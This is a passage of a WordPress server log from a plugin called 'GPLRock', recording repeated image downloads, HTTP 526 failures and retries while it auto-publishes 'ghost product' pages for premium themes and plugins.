UTC] GPLRock: Ghost product published with image - Product ID: themify-builder-ab-image [06-Apr-2026 12:27:17 UTC] GPLRock: Image downloaded successfully for product studiopress-enterprise-pro-genesis-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-44aa9d16.jpg [06-Apr-2026 12:27:17 UTC] GPLRock: Using pre-downloaded image for product studiopress-enterprise-pro-genesis-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-44aa9d16.jpg [06-Apr-2026 12:27:17 UTC] GPLRock: Ghost product published with image - Product ID: studiopress-enterprise-pro-genesis-wordpress-theme [06-Apr-2026 12:27:19 UTC] GPLRock: Image downloaded successfully for product easybook-directory-listing-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c5ee62d0.jpg [06-Apr-2026 12:27:19 UTC] GPLRock: Using pre-downloaded image for product easybook-directory-listing-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c5ee62d0.jpg [06-Apr-2026 12:27:19 UTC] GPLRock: Ghost product published with image - Product ID: easybook-directory-listing-wordpress-theme [06-Apr-2026 12:27:20 UTC] GPLRock: Image downloaded successfully for product woocommerce-product-retailers (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a934b180.jpg [06-Apr-2026 12:27:20 UTC] GPLRock: Using pre-downloaded image for product woocommerce-product-retailers: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a934b180.jpg [06-Apr-2026 12:27:20 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-product-retailers [06-Apr-2026 12:27:21 UTC] GPLRock: Image downloaded successfully for product formidable-forms-digital-signature (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a8ce6834.jpg [06-Apr-2026 12:27:21 UTC] GPLRock: Using pre-downloaded image for product formidable-forms-digital-signature: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a8ce6834.jpg [06-Apr-2026 12:27:21 UTC] GPLRock: Ghost product published with image - Product ID: formidable-forms-digital-signature [06-Apr-2026 12:27:23 UTC] GPLRock: Image downloaded successfully for product eventon-slider-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-6b3906da.jpg [06-Apr-2026 12:27:23 UTC] GPLRock: Using pre-downloaded image for product eventon-slider-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-6b3906da.jpg [06-Apr-2026 12:27:23 UTC] GPLRock: Ghost product published with image - Product ID: eventon-slider-addon [06-Apr-2026 12:27:24 UTC] GPLRock: Image downloaded successfully for product loginpress-hide-rename-login (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4c0bef0f.jpg [06-Apr-2026 12:27:24 UTC] GPLRock: Using pre-downloaded image for product loginpress-hide-rename-login: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4c0bef0f.jpg [06-Apr-2026 12:27:24 UTC] GPLRock: Ghost product published with image - Product ID: loginpress-hide-rename-login [06-Apr-2026 12:27:26 UTC] GPLRock: Image downloaded successfully for product ginza-furniture-theme-for-woocommerce-wordpress (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-eb07ebf2.jpg [06-Apr-2026 12:27:26 UTC] GPLRock: Using pre-downloaded image for product ginza-furniture-theme-for-woocommerce-wordpress: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-eb07ebf2.jpg [06-Apr-2026 12:27:26 UTC] GPLRock: Ghost product published with image - Product ID: ginza-furniture-theme-for-woocommerce-wordpress [06-Apr-2026 12:28:25 UTC] GPLRock: Image download failed for product timetable-booking-schedule-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:28:27 UTC] GPLRock: Image download failed for product timetable-booking-schedule-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:28:29 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/timetable-booking-schedule-for-wordpress-31633.webp for product timetable-booking-schedule-for-wordpress after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 12:28:29 UTC] GPLRock: Image download failed for product timetable-booking-schedule-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:28:31 UTC] GPLRock: Image download failed for product timetable-booking-schedule-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:28:33 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/timetable-booking-schedule-for-wordpress-31633.webp for product timetable-booking-schedule-for-wordpress after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 12:28:33 UTC] GPLRock WARNING: Image download failed for product timetable-booking-schedule-for-wordpress. URL: https://meldwp.com/wp-content/uploads/timetable-booking-schedule-for-wordpress-31633.webp [06-Apr-2026 12:28:33 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: timetable-booking-schedule-for-wordpress [06-Apr-2026 12:28:33 UTC] GPLRock: Image download failed for product wakingit-mailchimp-newsletter-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:28:36 UTC] GPLRock: Image download failed for product wakingit-mailchimp-newsletter-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:28:38 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wakingit-mailchimp-newsletter-wordpress-plugin-20893.webp for product wakingit-mailchimp-newsletter-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 12:28:38 UTC] GPLRock: Image download failed for product wakingit-mailchimp-newsletter-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:28:40 UTC] GPLRock: Image download failed for product wakingit-mailchimp-newsletter-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:28:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wakingit-mailchimp-newsletter-wordpress-plugin-20893.webp for product wakingit-mailchimp-newsletter-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 12:28:42 UTC] GPLRock WARNING: Image download failed for product wakingit-mailchimp-newsletter-wordpress-plugin. URL: https://meldwp.com/wp-content/uploads/wakingit-mailchimp-newsletter-wordpress-plugin-20893.webp [06-Apr-2026 12:28:42 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wakingit-mailchimp-newsletter-wordpress-plugin [06-Apr-2026 12:28:42 UTC] GPLRock: Image download failed for product foodbook-in-restaurant-orders-add-on (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:28:44 UTC] GPLRock: Image download failed for product foodbook-in-restaurant-orders-add-on (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:28:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/foodbook-in-restaurant-orders-add-on-32459.webp for product foodbook-in-restaurant-orders-add-on after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 12:28:46 UTC] GPLRock: Image download failed for product foodbook-in-restaurant-orders-add-on (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:28:49 UTC] GPLRock: Image download failed for product foodbook-in-restaurant-orders-add-on (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:28:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/foodbook-in-restaurant-orders-add-on-32459.webp for product foodbook-in-restaurant-orders-add-on after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 12:28:51 UTC] GPLRock WARNING: Image download failed for product foodbook-in-restaurant-orders-add-on. URL: https://meldwp.com/wp-content/uploads/foodbook-in-restaurant-orders-add-on-32459.webp [06-Apr-2026 12:28:51 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: foodbook-in-restaurant-orders-add-on [06-Apr-2026 12:28:51 UTC] GPLRock: Image download failed for product eventon-rest-api (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:28:53 UTC] GPLRock: Image download failed for product eventon-rest-api (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:28:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/eventon-rest-api-8880.webp for product eventon-rest-api after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 12:28:55 UTC] GPLRock: Image download failed for product eventon-rest-api (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:28:57 UTC] GPLRock: Image download failed for product eventon-rest-api (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:28:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/eventon-rest-api-8880.webp for product eventon-rest-api after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 12:28:59 UTC] GPLRock WARNING: Image download failed for product eventon-rest-api. URL: https://meldwp.com/wp-content/uploads/eventon-rest-api-8880.webp [06-Apr-2026 12:28:59 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: eventon-rest-api [06-Apr-2026 12:28:59 UTC] GPLRock: Image download failed for product woocommerce-mix-and-match-products-custom-product-boxes-bundles (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:29:01 UTC] GPLRock: Image download failed for product woocommerce-mix-and-match-products-custom-product-boxes-bundles (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:29:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-mix-and-match-products---custom-product-boxes-bundles-904.webp for product woocommerce-mix-and-match-products-custom-product-boxes-bundles after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 12:29:04 UTC] GPLRock: Image download failed for product woocommerce-mix-and-match-products-custom-product-boxes-bundles (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:29:06 UTC] GPLRock: Image download failed for product woocommerce-mix-and-match-products-custom-product-boxes-bundles (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:29:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-mix-and-match-products---custom-product-boxes-bundles-904.webp for product woocommerce-mix-and-match-products-custom-product-boxes-bundles after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 12:29:08 UTC] GPLRock WARNING: Image download failed for product woocommerce-mix-and-match-products-custom-product-boxes-bundles. URL: https://meldwp.com/wp-content/uploads/woocommerce-mix-and-match-products---custom-product-boxes-bundles-904.webp [06-Apr-2026 12:29:08 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-mix-and-match-products-custom-product-boxes-bundles [06-Apr-2026 12:29:08 UTC] GPLRock: Image download failed for product tiktokomatic-tiktok-video-importer (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:29:10 UTC] GPLRock: Image download failed for product tiktokomatic-tiktok-video-importer (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:29:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/tiktokomatic---tiktok-video-importer-20391.webp for product tiktokomatic-tiktok-video-importer after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 12:29:12 UTC] GPLRock: Image download failed for product tiktokomatic-tiktok-video-importer (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:29:14 UTC] GPLRock: Image download failed for product tiktokomatic-tiktok-video-importer (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:29:16 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/tiktokomatic---tiktok-video-importer-20391.webp for product tiktokomatic-tiktok-video-importer after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 12:29:16 UTC] GPLRock WARNING: Image download failed for product tiktokomatic-tiktok-video-importer. URL: https://meldwp.com/wp-content/uploads/tiktokomatic---tiktok-video-importer-20391.webp [06-Apr-2026 12:29:16 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: tiktokomatic-tiktok-video-importer [06-Apr-2026 12:29:17 UTC] GPLRock: Image downloaded successfully for product monkey-vat-tax-calculator (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-830fe360.webp [06-Apr-2026 12:29:17 UTC] GPLRock: Using pre-downloaded image for product monkey-vat-tax-calculator: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-830fe360.webp [06-Apr-2026 12:29:17 UTC] GPLRock: Ghost product published with image - Product ID: monkey-vat-tax-calculator [06-Apr-2026 12:29:17 UTC] GPLRock: Image downloaded successfully for product aero-for-wordpress-image-hover-effects (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-5def5235.webp [06-Apr-2026 12:29:17 UTC] GPLRock: Using pre-downloaded image for product aero-for-wordpress-image-hover-effects: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-5def5235.webp [06-Apr-2026 12:29:17 UTC] GPLRock: Ghost product published with image - Product ID: aero-for-wordpress-image-hover-effects [06-Apr-2026 12:29:17 UTC] GPLRock: Image download failed for product woocommerce-dimension-search (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:29:19 UTC] GPLRock: Image download failed for product woocommerce-dimension-search (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:29:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-dimension-search-8598.webp for product woocommerce-dimension-search after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 12:29:21 UTC] GPLRock: Image download failed for product woocommerce-dimension-search (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:29:23 UTC] GPLRock: Image download failed for product woocommerce-dimension-search (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:29:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-dimension-search-8598.webp for product woocommerce-dimension-search after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 12:29:25 UTC] GPLRock WARNING: Image download failed for product woocommerce-dimension-search. URL: https://meldwp.com/wp-content/uploads/woocommerce-dimension-search-8598.webp [06-Apr-2026 12:29:25 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-dimension-search [06-Apr-2026 12:29:26 UTC] GPLRock: Image download failed for product wp-mega-intro-amazing-intro-pages-for-wp (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:29:28 UTC] GPLRock: Image download failed for product wp-mega-intro-amazing-intro-pages-for-wp (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:29:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wp-mega-intro---amazing-intro-pages-for-wp-13069.webp for product wp-mega-intro-amazing-intro-pages-for-wp after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 12:29:30 UTC] GPLRock: Image download failed for product wp-mega-intro-amazing-intro-pages-for-wp (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:29:32 UTC] GPLRock: Image download failed for product wp-mega-intro-amazing-intro-pages-for-wp (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:29:34 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wp-mega-intro---amazing-intro-pages-for-wp-13069.webp for product wp-mega-intro-amazing-intro-pages-for-wp after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 12:29:34 UTC] GPLRock WARNING: Image download failed for product wp-mega-intro-amazing-intro-pages-for-wp. URL: https://meldwp.com/wp-content/uploads/wp-mega-intro---amazing-intro-pages-for-wp-13069.webp [06-Apr-2026 12:29:34 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wp-mega-intro-amazing-intro-pages-for-wp [06-Apr-2026 12:34:52 UTC] GPLRock: Image download failed for product mindcare-psychology-and-counseling-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:34:54 UTC] GPLRock: Image download failed for product mindcare-psychology-and-counseling-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:34:56 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mindcare---psychology-and-counseling-wordpress-theme-20281.webp for product mindcare-psychology-and-counseling-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 12:34:57 UTC] GPLRock: Image download failed for product mindcare-psychology-and-counseling-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:34:59 UTC] GPLRock: Image download failed for product mindcare-psychology-and-counseling-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:35:01 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mindcare---psychology-and-counseling-wordpress-theme-20281.webp for product mindcare-psychology-and-counseling-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 12:35:01 UTC] GPLRock WARNING: Image download failed for product mindcare-psychology-and-counseling-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/mindcare---psychology-and-counseling-wordpress-theme-20281.webp [06-Apr-2026 12:35:01 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: mindcare-psychology-and-counseling-wordpress-theme [06-Apr-2026 12:35:01 UTC] GPLRock: Image download failed for product avelina-chocolate-and-cake-shop-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:35:03 UTC] GPLRock: Image download failed for product avelina-chocolate-and-cake-shop-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:35:05 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/avelina---chocolate-and-cake-shop-wordpress-theme-30539.webp for product avelina-chocolate-and-cake-shop-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 12:35:05 UTC] GPLRock: Image download failed for product avelina-chocolate-and-cake-shop-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:35:07 UTC] GPLRock: Image download failed for product avelina-chocolate-and-cake-shop-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:35:09 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/avelina---chocolate-and-cake-shop-wordpress-theme-30539.webp for product avelina-chocolate-and-cake-shop-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 12:35:09 UTC] GPLRock WARNING: Image download failed for product avelina-chocolate-and-cake-shop-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/avelina---chocolate-and-cake-shop-wordpress-theme-30539.webp [06-Apr-2026 12:35:09 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: avelina-chocolate-and-cake-shop-wordpress-theme [06-Apr-2026 12:35:10 UTC] GPLRock: Image download failed for product consulta-professional-business-financial-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:35:12 UTC] GPLRock: Image download failed for product consulta-professional-business-financial-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:35:14 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/consulta---professional-business--financial-wordpress-theme-31507.webp for product consulta-professional-business-financial-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 12:35:14 UTC] GPLRock: Image download failed for product consulta-professional-business-financial-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:35:16 UTC] GPLRock: Image download failed for product consulta-professional-business-financial-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:35:18 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/consulta---professional-business--financial-wordpress-theme-31507.webp for product consulta-professional-business-financial-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 12:35:18 UTC] GPLRock WARNING: Image download failed for product consulta-professional-business-financial-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/consulta---professional-business--financial-wordpress-theme-31507.webp [06-Apr-2026 12:35:18 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: consulta-professional-business-financial-wordpress-theme [06-Apr-2026 12:35:18 UTC] GPLRock: Image download failed for product oxence-web-design-agency-elementor-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:35:20 UTC] GPLRock: Image download failed for product oxence-web-design-agency-elementor-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:35:23 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/oxence---web-design-agency-elementor-wordpress-theme-23927.webp for product oxence-web-design-agency-elementor-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 12:35:23 UTC] GPLRock: Image download failed for product oxence-web-design-agency-elementor-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:35:25 UTC] GPLRock: Image download failed for product oxence-web-design-agency-elementor-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:35:27 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/oxence---web-design-agency-elementor-wordpress-theme-23927.webp for product oxence-web-design-agency-elementor-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 12:35:27 UTC] GPLRock WARNING: Image download failed for product oxence-web-design-agency-elementor-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/oxence---web-design-agency-elementor-wordpress-theme-23927.webp [06-Apr-2026 12:35:27 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: oxence-web-design-agency-elementor-wordpress-theme [06-Apr-2026 12:35:27 UTC] GPLRock: Image download failed for product newzin-wordpress-newspaper-magazine-elementor-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:35:29 UTC] GPLRock: Image download failed for product newzin-wordpress-newspaper-magazine-elementor-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:35:31 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/newzin---wordpress-newspaper--magazine-elementor-theme-5560.webp for product newzin-wordpress-newspaper-magazine-elementor-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 12:35:31 UTC] GPLRock: Image download failed for product newzin-wordpress-newspaper-magazine-elementor-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:35:33 UTC] GPLRock: Image download failed for product newzin-wordpress-newspaper-magazine-elementor-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:35:35 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/newzin---wordpress-newspaper--magazine-elementor-theme-5560.webp for product newzin-wordpress-newspaper-magazine-elementor-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 12:35:35 UTC] GPLRock WARNING: Image download failed for product newzin-wordpress-newspaper-magazine-elementor-theme. URL: https://meldwp.com/wp-content/uploads/newzin---wordpress-newspaper--magazine-elementor-theme-5560.webp [06-Apr-2026 12:35:35 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: newzin-wordpress-newspaper-magazine-elementor-theme [06-Apr-2026 12:35:36 UTC] GPLRock: Image download failed for product soundboard-a-premium-responsive-music-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:35:38 UTC] GPLRock: Image download failed for product soundboard-a-premium-responsive-music-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:35:40 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/soundboard---a-premium-responsive-music-wordpress-theme-7466.webp for product soundboard-a-premium-responsive-music-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 12:35:40 UTC] GPLRock: Image download failed for product soundboard-a-premium-responsive-music-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:35:42 UTC] GPLRock: Image download failed for product soundboard-a-premium-responsive-music-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:35:44 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/soundboard---a-premium-responsive-music-wordpress-theme-7466.webp for product soundboard-a-premium-responsive-music-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 12:35:44 UTC] GPLRock WARNING: Image download failed for product soundboard-a-premium-responsive-music-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/soundboard---a-premium-responsive-music-wordpress-theme-7466.webp [06-Apr-2026 12:35:44 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: soundboard-a-premium-responsive-music-wordpress-theme [06-Apr-2026 12:35:44 UTC] GPLRock: Image download failed for product luxury-spa-wellness-and-beauty-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:35:46 UTC] GPLRock: Image download failed for product luxury-spa-wellness-and-beauty-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:35:48 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/luxury-spa---wellness-and-beauty-wordpress-theme-21275.webp for product luxury-spa-wellness-and-beauty-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 12:35:49 UTC] GPLRock: Image download failed for product luxury-spa-wellness-and-beauty-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:35:51 UTC] GPLRock: Image download failed for product luxury-spa-wellness-and-beauty-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:35:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/luxury-spa---wellness-and-beauty-wordpress-theme-21275.webp for product luxury-spa-wellness-and-beauty-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 12:35:53 UTC] GPLRock WARNING: Image download failed for product luxury-spa-wellness-and-beauty-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/luxury-spa---wellness-and-beauty-wordpress-theme-21275.webp [06-Apr-2026 12:35:53 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: luxury-spa-wellness-and-beauty-wordpress-theme [06-Apr-2026 12:35:53 UTC] GPLRock: Image download failed for product anevo-personal-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:35:55 UTC] GPLRock: Image download failed for product anevo-personal-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:35:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/anevo---personal-portfolio-wordpress-theme-14474.webp for product anevo-personal-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 12:35:57 UTC] GPLRock: Image download failed for product anevo-personal-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:35:59 UTC] GPLRock: Image download failed for product anevo-personal-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:36:01 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/anevo---personal-portfolio-wordpress-theme-14474.webp for product anevo-personal-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 12:36:01 UTC] GPLRock WARNING: Image download failed for product anevo-personal-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/anevo---personal-portfolio-wordpress-theme-14474.webp [06-Apr-2026 12:36:01 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: anevo-personal-portfolio-wordpress-theme [06-Apr-2026 12:36:02 UTC] GPLRock: Image download failed for product milzincard-resume-cv-portfolio-vcard-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:36:04 UTC] GPLRock: Image download failed for product milzincard-resume-cv-portfolio-vcard-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:36:06 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/milzincard-resume--cv--portfolio-vcard-wordpress-theme-12319.webp for product milzincard-resume-cv-portfolio-vcard-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 12:36:06 UTC] GPLRock: Image download failed for product milzincard-resume-cv-portfolio-vcard-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:36:08 UTC] GPLRock: Image download failed for product milzincard-resume-cv-portfolio-vcard-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:36:10 UTC] GPLRock Error: Failed to download image from 